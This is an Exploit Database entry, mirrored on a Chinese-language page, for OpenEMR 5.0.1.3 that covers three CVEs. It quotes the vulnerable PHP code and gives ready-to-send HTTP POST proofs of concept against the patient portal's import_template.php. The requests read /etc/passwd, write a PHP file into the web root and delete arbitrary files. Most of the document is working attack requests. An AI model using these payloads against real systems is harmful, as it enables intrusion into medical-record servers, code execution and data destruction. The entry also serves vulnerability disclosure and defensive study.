OpenEMR 5.0.1.3 – (Authenticated) Arbitrary File Actions

• Exploit Database
• 117 阅读

• 作者： Joshua Fam
  日期： 2018-08-16
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/45202/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89

  # Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions # Date: 2018-08-14 # Exploit Author: Joshua Fam # Twitter : @Insecurity # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz # Version: < 5.0.1.3 # Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3 # CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140   # 1.Arbitrary File Read: # In OpenEmr a user that has access to the portal can send a malcious # POST request to read arbitrary files.   # i.Vulnerable Code: #if ($_POST[&apos;mode&apos;] == &apos;get&apos;) { #echo file_get_contents($_POST[&apos;docid&apos;]); #exit; #}   # ii. Proof of Concept: POST /openemr/portal/import_template.php HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 26   mode=get&docid=/etc/passwd   # 2.Arbitrary File Write: # In OpenEmr a user that has access to the portal can send a malcious # POST request to write arbitrary files. #i. Vulnerable Code: #} else if ($_POST[&apos;mode&apos;] == &apos;save&apos;) { #file_put_contents($_POST[&apos;docid&apos;], $_POST[&apos;content&apos;]); #exit(true); #}   #ii. Proof of Concept: POST /openemr/portal/import_template.php HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 54   mode=save&docid=payload.php&content=<?php phpinfo();?>   # After sending this navigate to payload.php at http://hostname/openemr/portal   # 3. Arbitrary File Delete: # In OpenEmr a user that has access to the portal can send a malcious # POST request to delete a arbitrary file.   #i. Vulnerable Code: # } else if ($_POST[&apos;mode&apos;] == &apos;delete&apos;) { # unlink($_POST[&apos;docid&apos;]); # exit(true); # }   #ii. Proof of Concept: POST /openemr/portal/import_template.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 29   mode=delete&docid=payload.php # After completing this request, when you navigate to payload.php, you should be greeted by a 404 page.